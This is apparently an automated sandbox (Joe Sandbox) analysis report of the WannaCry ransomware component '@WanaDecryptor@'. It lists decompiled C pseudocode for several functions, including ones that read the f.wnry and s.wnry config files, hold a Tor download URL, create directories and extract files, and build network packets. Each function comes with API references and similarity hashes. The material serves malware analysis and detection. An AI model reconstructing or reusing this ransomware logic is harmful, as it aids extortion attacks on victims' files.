                                                      				L00412D4C();
                                                      				_v4 = 0;
                                                      				L00412D3A();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t15;
                                                      			}

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040BE90(char* _a4, char* _a8, char* _a12) {
                                                      
                                                      				strncpy("s.wnry", _a4, 0x63);
                                                      				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
                                                      				strncpy(0x4221ac, _a12, 0x63);
                                                      				return 0;
                                                      			}

                                                      APIs
                                                      Strings
                                                      • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                                      • s.wnry, xrefs: 0040BE97
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy
                                                      • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                                      • API String ID: 3301158039-3000313716
                                                      • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                                      • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                                      • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				char _v1252;
                                                      				void _v2251;
                                                      				char _v2252;
                                                      				int _v2256;
                                                      				signed int _t43;
                                                      				signed char _t44;
                                                      				signed int _t52;
                                                      				signed int _t58;
                                                      				signed int _t75;
                                                      				signed int _t78;
                                                      				struct _IO_FILE* _t103;
                                                      				intOrPtr _t111;
                                                      				void* _t113;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041369B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t111;
                                                      				_t103 = fopen("f.wnry", "rt");
                                                      				_t113 = _t111 - 0x8c4 + 8;
                                                      				if(_t103 != 0) {
                                                      					E00401E90( &_v1252, __eflags);
                                                      					_v4 = 0;
                                                      					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                                      					__eflags = _t43;
                                                      					if(_t43 != 0) {
                                                      						_t44 =  *(_t103 + 0xc);
                                                      						_v2256 = 0;
                                                      						__eflags = _t44 & 0x00000010;
                                                      						if((_t44 & 0x00000010) == 0) {
                                                      							while(1) {
                                                      								_v2252 = 0;
                                                      								memset( &_v2251, 0, 0xf9 << 2);
                                                      								asm("stosw");
                                                      								asm("stosb");
                                                      								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                                      								_t113 = _t113 + 0x18;
                                                      								__eflags = _t52;
                                                      								if(_t52 == 0) {
                                                      									break;
                                                      								}
                                                      								asm("repne scasb");
                                                      								_t75 = 0xbadbac;
                                                      								__eflags = 0xbadbac;
                                                      								if(0xbadbac != 0) {
                                                      									while(1) {
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										L9:
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t78 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                                      											goto L10;
                                                      										}
                                                      										asm("repne scasb");
                                                      										__eflags =  !(_t78 | 0xffffffff) != 1;
                                                      										if( !(_t78 | 0xffffffff) != 1) {
                                                      											_t58 = E00402650( &_v1252,  &_v2252);
                                                      											__eflags = _t58;
                                                      											if(_t58 != 0) {
                                                      												_t29 =  &_v2256;
                                                      												 *_t29 = _v2256 + 1;
                                                      												__eflags =  *_t29;
                                                      											}
                                                      										}
                                                      										goto L14;
                                                      										L10:
                                                      										asm("repne scasb");
                                                      										_t75 =  !(_t78 | 0xffffffff) - 1;
                                                      										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										goto L9;
                                                      									}
                                                      								}
                                                      								L14:
                                                      								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                                      								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                                      									continue;
                                                      								}
                                                      								break;
                                                      							}
                                                      						}
                                                      						fclose(_t103);
                                                      						__eflags = _v2256;
                                                      						_t36 = _v2256 > 0;
                                                      						__eflags = _t36;
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0 | _t36;
                                                      					} else {
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						__eflags = 0;
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					 *[fs:0x0] = _v12;
                                                      					return 0;
                                                      				}
                                                      			}



















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                                      				char _v520;
                                                      				void _v816;
                                                      				struct _SECURITY_ATTRIBUTES* _v820;
                                                      				void* _t15;
                                                      				struct _SECURITY_ATTRIBUTES* _t37;
                                                      				CHAR* _t38;
                                                      				void* _t39;
                                                      				CHAR* _t40;
                                                      				struct _SECURITY_ATTRIBUTES** _t42;
                                                      				struct _SECURITY_ATTRIBUTES** _t44;
                                                      
                                                      				_t40 = _a4;
                                                      				CreateDirectoryA(_t40, 0);
                                                      				_t38 = _a8;
                                                      				_t15 = E00412920(_t38, _a12);
                                                      				_t28 = _t15;
                                                      				_t42 =  &(( &_v820)[2]);
                                                      				if(_t15 != 0) {
                                                      					_v820 = 0;
                                                      					memset( &_v816, 0, 0x4a << 2);
                                                      					E00412940(_t28, 0xffffffff,  &_v820);
                                                      					_t37 = _v820;
                                                      					_t44 =  &(_t42[6]);
                                                      					if(_t37 > 0) {
                                                      						_t39 = 0;
                                                      						if(_t37 > 0) {
                                                      							do {
                                                      								E00412940(_t28, _t39,  &_v820);
                                                      								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                                      								E004129E0(_t28, _t39,  &_v520);
                                                      								_t44 =  &(_t44[0xa]);
                                                      								_t39 = _t39 + 1;
                                                      							} while (_t39 < _t37);
                                                      						}
                                                      						E00412A00(_t28);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					DeleteFileA(_t38);
                                                      					return 0;
                                                      				}
                                                      			}














                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                                      				char _v500;
                                                      				intOrPtr _v508;
                                                      				char _v520;
                                                      				char _v521;
                                                      				char _v528;
                                                      				char _v529;
                                                      				intOrPtr _v536;
                                                      				signed int _t42;
                                                      				short _t46;
                                                      				signed int _t48;
                                                      				int _t62;
                                                      				intOrPtr* _t63;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t89;
                                                      				void* _t94;
                                                      				intOrPtr* _t95;
                                                      				void* _t97;
                                                      				void* _t99;
                                                      
                                                      				_t89 = __edi;
                                                      				_t63 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t99 =  &_v508 + 8;
                                                      				_t42 = rand();
                                                      				asm("cdq");
                                                      				_t94 = 0;
                                                      				_t81 = _t42 % 0xc8 + 0x1f;
                                                      				_v508 = _t81;
                                                      				if(_t81 > 0) {
                                                      					do {
                                                      						_t62 = rand();
                                                      						_t81 = _v508;
                                                      						 *(_t99 + _t94 + 0x14) = _t62;
                                                      						_t94 = _t94 + 1;
                                                      					} while (_t94 < _t81);
                                                      				}
                                                      				_t95 = _a16;
                                                      				_t97 = _t99 + _t81 - 0xb;
                                                      				if(_t95 != 0) {
                                                      					_push(_t89);
                                                      					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                                      					_t99 = _t99 + 0xc;
                                                      					asm("movsw");
                                                      					asm("movsb");
                                                      					_t81 = _v508;
                                                      					_t95 = _a16;
                                                      				}
                                                      				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                                      				_t82 = _t81 + 1;
                                                      				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                                      				_t83 = _t82 + 1;
                                                      				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                                      				_v508 = _t83 + 1;
                                                      				_t46 = E00412B00(_t97, 0x1f);
                                                      				_t67 = _v508;
                                                      				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                                      				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                                      				if(_t48 < 0) {
                                                      					L12:
                                                      					return _t48 | 0xffffffff;
                                                      				} else {
                                                      					E0040D5A0(_t63, _t97);
                                                      					_push( &_v528);
                                                      					_push( &_v520);
                                                      					_push( &_v521);
                                                      					_v528 = 0x1f4;
                                                      					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                                      						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                                      						goto L12;
                                                      					} else {
                                                      						if(_t95 == 0) {
                                                      							L10:
                                                      							return 0;
                                                      						} else {
                                                      							_push(1);
                                                      							_push(_v536);
                                                      							_push( &_v528);
                                                      							_push(2);
                                                      							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                                      				long _t28;
                                                      				signed int _t38;
                                                      				void* _t44;
                                                      				long* _t45;
                                                      				long _t46;
                                                      				char _t47;
                                                      
                                                      				_t47 = _a12;
                                                      				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                                      					_t45 = _a16;
                                                      					_t44 = 0;
                                                      					_t38 = 0;
                                                      					 *_t45 = 0;
                                                      					_a12 = 0;
                                                      					if(_t47 == 1) {
                                                      						_t44 = _a4;
                                                      						_a12 = 0;
                                                      						goto L10;
                                                      					} else {
                                                      						if(_t47 != 2) {
                                                      							L11:
                                                      							_push(0x20);
                                                      							L00412CEC();
                                                      							_t46 = _t28;
                                                      							if(_t47 == 1 || _t47 == 2) {
                                                      								 *_t46 = 1;
                                                      								 *((char*)(_t46 + 0x10)) = _a12;
                                                      								 *(_t46 + 1) = _t38;
                                                      								 *(_t46 + 4) = _t44;
                                                      								 *((char*)(_t46 + 8)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								if(_t38 != 0) {
                                                      									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
                                                      								}
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							} else {
                                                      								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                                      								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
                                                      								 *_t46 = 0;
                                                      								 *(_t46 + 1) = 1;
                                                      								 *((char*)(_t46 + 0x10)) = 0;
                                                      								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							}
                                                      						} else {
                                                      							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                      							if(_t44 != 0xffffffff) {
                                                      								_a12 = 1;
                                                      								L10:
                                                      								_t28 = SetFilePointer(_t44, 0, 0, 1);
                                                      								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                                      								goto L11;
                                                      							} else {
                                                      								 *_t45 = 0x200;
                                                      								return 0;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					 *_a16 = 0x10000;
                                                      					return 0;
                                                      				}
                                                      			}










                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      • String ID:
                                                      • API String ID: 3407337251-0
                                                      • Opcode ID: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                                      • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                                      • Opcode Fuzzy Hash: 60c44a9ea6338bdef0f7b00b9d617ba4f076ca8c1f1597f154903f254465afcb
                                                      • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
                                                      				void _v260;
                                                      				char _v520;
                                                      				long _t16;
                                                      				void* _t17;
                                                      				void* _t29;
                                                      				CHAR* _t32;
                                                      				signed int _t33;
                                                      				signed int _t34;
                                                      				signed int _t36;
                                                      				signed int _t39;
                                                      				unsigned int _t46;
                                                      				signed int _t47;
                                                      				signed int _t51;
                                                      				signed int _t52;
                                                      				void* _t56;
                                                      				void* _t83;
                                                      				void* _t85;
                                                      				void* _t86;
                                                      				void* _t87;
                                                      				char* _t88;
                                                      				char* _t93;
                                                      
                                                      				_t88 =  &_v520;
                                                      				_t32 = _a4;
                                                      				if(_t32 != 0) {
                                                      					_t16 = GetFileAttributesA(_t32);
                                                      					if(_t16 == 0xffffffff) {
                                                      						_t16 = CreateDirectoryA(_t32, 0);
                                                      					}
                                                      				}
                                                      				_t87 = _a8;
                                                      				_t34 =  *_t87;
                                                      				if(_t34 == 0) {
                                                      					L15:
                                                      					return _t16;
                                                      				} else {
                                                      					_t17 = _t87;
                                                      					_t56 = _t87;
                                                      					do {
                                                      						if(_t34 == 0x2f || _t34 == 0x5c) {
                                                      							_t17 = _t56;
                                                      						}
                                                      						_t34 =  *(_t56 + 1);
                                                      						_t56 = _t56 + 1;
                                                      					} while (_t34 != 0);
                                                      					if(_t17 != _t87) {
                                                      						_t86 = _t87;
                                                      						_t51 = _t17 - _t87;
                                                      						_t52 = _t51 >> 2;
                                                      						memcpy( &_v260, _t86, _t52 << 2);
                                                      						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                                      						_t93 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      						_t93[_t29 + 0x114] = 0;
                                                      						E00412250(_t32,  &_v260);
                                                      						_t88 =  &(_t93[8]);
                                                      					}
                                                      					_v520 = 0;
                                                      					if(_t32 != 0) {
                                                      						asm("repne scasb");
                                                      						_t46 =  !(_t34 | 0xffffffff);
                                                      						_t85 = _t32 - _t46;
                                                      						_t47 = _t46 >> 2;
                                                      						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                                      						_t88 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      					}
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t34 | 0xffffffff);
                                                      					_t83 = _t87 - _t36;
                                                      					_t33 = _t36;
                                                      					asm("repne scasb");
                                                      					_t39 = _t33 >> 2;
                                                      					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                                      					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                                      					_t16 = GetFileAttributesA( &_v520);
                                                      					if(_t16 != 0xffffffff) {
                                                      						goto L15;
                                                      					} else {
                                                      						return CreateDirectoryA( &_v520, 0);
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID:
                                                      • API String ID: 3401506121-0
                                                      • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                                      • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                                      				void* _t15;
                                                      				signed int _t23;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				_t23 = _a12;
                                                      				_t33 = _a4;
                                                      				_push(_t23);
                                                      				_push(_a8);
                                                      				_t34 = __ecx;
                                                      				_push(_t33);
                                                      				L00412D6A();
                                                      				if(_t23 > 6) {
                                                      					L12:
                                                      					return _t15;
                                                      				} else {
                                                      					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                                      						case 0:
                                                      							_push( *((intOrPtr*)(__ecx + 0x824)));
                                                      							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                                      							L00412D64();
                                                      							if(_t17 == 0x402) {
                                                      								L6:
                                                      								_push(0xe0e0);
                                                      								 *((intOrPtr*)( *_t33 + 0x38))();
                                                      							} else {
                                                      								L00412D64();
                                                      								if(_t17 == 0x3fe) {
                                                      									goto L6;
                                                      								} else {
                                                      									L00412D64();
                                                      									if(_t17 == 0x3fb) {
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffff);
                                                      										 *((intOrPtr*)( *_t33 + 0x38))();
                                                      									}
                                                      								}
                                                      							}
                                                      							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                                      							if(_t35 != 0) {
                                                      								goto L11;
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      						case 1:
                                                      							goto L12;
                                                      						case 2:
                                                      							_push( *((intOrPtr*)(__esi + 0x824)));
                                                      							__ecx = __edi;
                                                      							 *((intOrPtr*)( *__edi + 0x34))();
                                                      							if(__esi != 0) {
                                                      								L11:
                                                      								return  *((intOrPtr*)(_t35 + 4));
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      					}
                                                      				}
                                                      				L13:
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      • String ID:
                                                      • API String ID: 2870283385-0
                                                      • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                                      • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
